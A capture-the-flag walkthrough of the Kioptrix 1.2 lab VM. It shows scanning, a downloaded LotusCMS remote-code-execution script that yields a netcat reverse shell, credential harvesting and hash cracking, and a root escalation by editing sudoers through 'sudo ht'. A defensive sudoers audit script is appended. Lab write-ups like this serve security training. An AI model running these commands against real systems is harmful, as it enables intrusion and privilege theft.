VulnHub: Kioptrix: Level 1.2 (#3)

ratiros01
6 min read · Mar 11, 2021

Link: https://www.vulnhub.com/entry/kioptrix-level-12-3,24/

1. Network discovery

nmap -sn <ip>/24

My target is 10.0.2.8.

Reading the VM's description, I have to edit the hosts file.

On the attacker machine, edit the hosts file.

nano /etc/hosts

Add the IP and host name.

2. Port scan

nmap -Pn 10.0.2.8
nmap -Pn -p1000- 10.0.2.8

There are only 2 open ports.

3. OS and service scan

nmap -A -p22,80 10.0.2.8

4. Vuln scan

nmap --script vuln -p22,80 10.0.2.8

There are pages on the HTTP service on port 80 and a possibility of SQL injection.

6. Nikto scan

nikto -h http://10.0.2.8

There’s “/phpmyadmin” and some other possible vulnerabilities.

7. Access the site

View page source

Explore everything

The last one is the login page; it indicated that this site was based on LotusCMS.

8. Exploitation

Search for exploit scripts

searchsploit lotuscms

There's a script, but it's a Metasploit script.

After googling, I came across this script.

Download it

wget https://raw.githubusercontent.com/Hood3dRob1n/LotusCMS-Exploit/master/lotusRCE.sh

Change the permission and run the script

chmod 777 lotusRCE.sh
./lotusRCE.sh

I got the usage.

Run the script again

./lotusRCE.sh kioptrix3.com

Before supplying an IP, I need a reverse shell.

Create a listener on port 1234

rlwrap nc -lvp 1234

Supply the input

IP: 10.0.2.24 (attacker IP)
PORT: 1234

I select the first netcat command

#? 1

Back at the listener, I now have a shell. Type a command to verify

ls

I need a TTY shell

python -c 'import pty;pty.spawn("/bin/bash");'

Verify the user

whoami

9. Privilege escalation

cd /home
ls

There are 3 directories.

In loneferret there are 2 interesting files.

cat checksec.sh | less

Not much right now.

Read the next file

cat CompanyPolicy.README

There's a “sudo ht” command to use.

Let’s try

sudo ht

I don't have the password for ‘www-data’.

Continue exploring in “/www”. Normally, a CMS has a config file containing the username and password for the SQL connection, and I have to find it.

I found it in gconfig.php

cat gconfig.php

Now I have the username and password for MySQL.

Since the site also has phpMyAdmin, I'll access the MySQL DB with the GUI.

Accessing database gallery and table dev_accounts, I have the hashes of these users, dreg and loneferret.

Crack them with CrackStation

Change user to dreg, entering the cracked password

su dreg
Mast3r

I tried to explore, but it didn't allow me to use the ‘cd’ command.

Tried ‘sudo ht’. User ‘dreg’ is not in the sudoers file.

Change to loneferret, entering the cracked password

su loneferret
starwars

Tried sudo ht

sudo ht

I could not use this command because the terminal was not fully functional.

Since it involved ‘sudo ht’, my first guess for privilege escalation was sudo permissions.

Verify the sudo permissions of loneferret

sudo -l

Tried su

sudo su

Not allowed

Next is the ‘ht’ command; I did not know what it was. Eventually, I googled it and found that it is an editor. Because of that, I can run ‘sudo ht’ and edit the sudoers file to escalate my privileges.

I need a fully functional terminal

ssh loneferret@10.0.2.8

I found a guide to use ht editor.

Run ht

sudo ht

Press F3, type “/etc/sudoers” and press “Enter” to open the file

My first try was removing the ‘!’

Press F2 to save and CTRL+c to exit

sudo su -

Still no go

Edit the file again by adding

/bin/bash

Verify the edit

sudo -l
sudo /bin/bash -p

Now I’m root.

Find the flag

cd /root
cat Congrats.txt
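As an added defensive check (not from the writeup or the box), the script below parses sudoers user-specification lines and flags the properties that make a grant like the one edited above equivalent to root: a file-writing editor such as ht, a ‘!’ negation sitting next to an allowed command, and NOPASSWD. The sample rules are constructed to resemble the situation described, not copied from the box, and a single-file sudoedit grant is shown as the hardened alternative.

```python
import re
from typing import Dict, List

# Commands that let a sudo caller write arbitrary files as root (editors,
# pagers with shell escapes) or start a root shell. Illustrative, not exhaustive.
ROOT_FILE_WRITERS = {"ht", "vi", "vim", "nano", "less", "more", "bash", "sh"}

# user  host=(runas)  TAG:  cmd1, !cmd2 ...
RULE_RE = re.compile(r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?"
                     r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")

def parse_sudoers(text: str) -> List[Dict]:
    """Parse user-specification lines; comments, blanks and Defaults are skipped."""
    rules = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if m:
            rules.append({"user": m.group("user"), "host": m.group("host"),
                          "runas": m.group("runas") or "root",
                          "tags": [t.strip() for t in m.group("tags").split(":") if t.strip()],
                          "cmds": [c.strip() for c in m.group("cmds").split(",")]})
    return rules

def audit(text: str) -> List[str]:
    """Return one finding per rule property that makes the grant equivalent to root."""
    findings = []
    for r in parse_sudoers(text):
        if r["user"] == "root":
            continue
        allowed = [c for c in r["cmds"] if not c.startswith("!")]
        denied = [c[1:] for c in r["cmds"] if c.startswith("!")]
        for cmd in allowed:
            prog = cmd.split()[0].rsplit("/", 1)[-1]   # basename of the binary
            if cmd == "ALL" or prog in ROOT_FILE_WRITERS:
                findings.append(f"{r['user']}: '{cmd}' can rewrite /etc/sudoers or spawn a root shell")
        if denied and allowed:
            findings.append(f"{r['user']}: '!' on {', '.join(denied)} is no boundary while other commands are allowed")
        if "NOPASSWD" in r["tags"]:
            findings.append(f"{r['user']}: NOPASSWD removes the password check as well")
    return findings

# Constructed sample shaped like the rule the writeup edits (not the box's real file).
WEAK = "Defaults env_reset\nroot ALL=(ALL) ALL\nloneferret ALL=NOPASSWD: !/usr/bin/su, /usr/local/bin/ht\n"
# Hardened alternative: a per-file sudoedit grant instead of a general-purpose editor.
HARDENED = "root ALL=(ALL) ALL\nloneferret ALL=(root) sudoedit /etc/app/settings.conf\n"

if __name__ == "__main__":
    for f in audit(WEAK):
        print("WEAK:", f)
    print("HARDENED findings:", audit(HARDENED))
```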
